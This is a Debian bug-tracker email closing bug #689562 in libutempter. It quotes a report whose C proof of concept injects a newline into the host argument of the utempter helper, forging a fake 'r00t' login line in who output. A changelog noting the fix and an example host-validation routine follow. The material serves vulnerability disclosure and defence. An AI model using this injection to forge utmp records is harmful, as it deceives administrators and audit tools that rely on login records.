Your message dated Wed, 02 Oct 2019 17:49:37 +0000 with message-id <[email protected]> and subject line Bug#689562: fixed in libutempter 1.1.6-4 has caused the Debian Bug report #689562, regarding /usr/lib/utempter/utempter: Allows fake host setting to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [email protected] immediately.)

--
689562: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=689562
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: libutempter0
Version: 1.1.5-3
Severity: normal
File: /usr/lib/utempter/utempter

Utempter does not (cannot?) verify the setting of host, so it can easily
be faked. This may affect any software that depends on utmp correctness.

Demo of the issue:

psz@bari:~$ cat silly.c
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>

int main() {
  int i;
  i = open("/dev/ptmx", O_RDWR);
  printf("open ptmx returned %d\n", i);
  dup2(i, 0);
  /* dup2(i, 1); */
  printf("doing utempter add\n");
  system("/usr/lib/utempter/utempter add 'xyz)\nr00t pts/0 Jan 1 01:02 (xyz.com'");
  printf("checking who\n");
  system("who | grep xyz");
  printf("doing utempter del\n");
  system("/usr/lib/utempter/utempter del");
  printf("checking who\n");
  system("who | grep xyz");
  printf("DONE\n");
}
psz@bari:~$ cc silly.c; a.out
open ptmx returned 3
doing utempter add
checking who
psz pts/29 Oct 4 11:48 (xyz)
r00t pts/0 Jan 1 01:02 (xyz.com)
doing utempter del
checking who
DONE
psz@bari:~$

Please see also:
http://bugs.debian.org/329156
http://bugs.debian.org/330907

Cheers, Paul

Paul Szabo [email protected] http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

-- System Information:
Debian Release: 6.0.6
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 3.2.19-pk06.01-i386 (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/bash

Versions of packages libutempter0 depends on:
ii  adduser  3.112+nmu2  add and remove users and groups
ii  libc6    2.11.3-4    Embedded GNU C Library: Shared lib

libutempter0 recommends no packages.

libutempter0 suggests no packages.

-- no debconf information
--- End Message ---
--- Begin Message ---
Source: libutempter
Source-Version: 1.1.6-4

We believe that the bug you reported is fixed in the latest version of
libutempter, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Christian Göttsche <[email protected]> (supplier of updated libutempter package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])

Format: 1.8
Date: Mon, 30 Sep 2019 23:37:44 +0200
Source: libutempter
Architecture: source
Version: 1.1.6-4
Distribution: unstable
Urgency: medium
Maintainer: Christian Göttsche <[email protected]>
Changed-By: Christian Göttsche <[email protected]>
Closes: 689562 879388
Changes:
 libutempter (1.1.6-4) unstable; urgency=medium
 .
   * Set myself as new maintainer (Closes: #879388)
   * Update vcs fields accordingly
   * Bump to compat level 12
   * Bump to std version 4.4.1
   * Enable all hardening options in d/rules
   * Add autopkg testsuite
   * Convert d/copyright to machine-readable format
   * Add standard salsa-ci configuration, exclude reprotest for chown failures
   * Remove unneeded ignore file for list-missing
   * Explicit set Build-Depends-Package in d/libutempter0.symbols
   * Explicit set Rules-Requires-Root to binary-targets
   * Add C compiler -Wextra flag in d/rules
   * Patches:
     - Convert to gbp style
     - add: Mark old interfaces as deprecated
     - add: Validate given hostname (Closes: #689562)
--- End Message ---
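
The changelog entry "Validate given hostname" names the class of fix for the report above. The following is an added example of an allow-list check of that kind; it is not the patch shipped in libutempter 1.1.6-4, and the names example_validate_host, host_char_ok and EXAMPLE_HOST_MAX, the permitted character set and the handling of a missing host are assumptions of this example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed bound for this example; the utmp host field is fixed-size
 * (UT_HOSTSIZE in <utmp.h>), so over-long values are refused, not truncated. */
#define EXAMPLE_HOST_MAX 255

/* Hypothetical helper: allow only characters found in DNS names, numeric
 * IPv4/IPv6 addresses and X display names such as ":0". */
static bool host_char_ok(unsigned char c)
{
    if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9'))
        return true;
    return c == '.' || c == '-' || c == ':' || c == '_';
}

/* Returns true only if every byte of host is on the allow-list. Newlines,
 * spaces, parentheses and control bytes are rejected, so the value cannot
 * start a second line or close the "(host)" field in who(1) output. */
bool example_validate_host(const char *host)
{
    size_t len, i;

    if (host == NULL)
        return false;   /* assumption: caller handles "no host" separately */
    len = strlen(host);
    if (len == 0 || len > EXAMPLE_HOST_MAX)
        return false;
    for (i = 0; i < len; i++)
        if (!host_char_ok((unsigned char)host[i]))
            return false;
    return true;
}

int main(void)
{
    /* Constructed inputs; the last one is the string from the report above. */
    const char *samples[] = {
        "xyz.com", "192.0.2.10", "2001:db8::1", ":0",
        "xyz)\nr00t pts/0 Jan 1 01:02 (xyz.com",
    };
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%s: %s\n", example_validate_host(samples[i]) ? "accept" : "reject",
               samples[i]);
    return 0;
}
```

A check like this belongs in the privileged helper itself, before the utmp record is written, because the unprivileged caller controls the argument.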

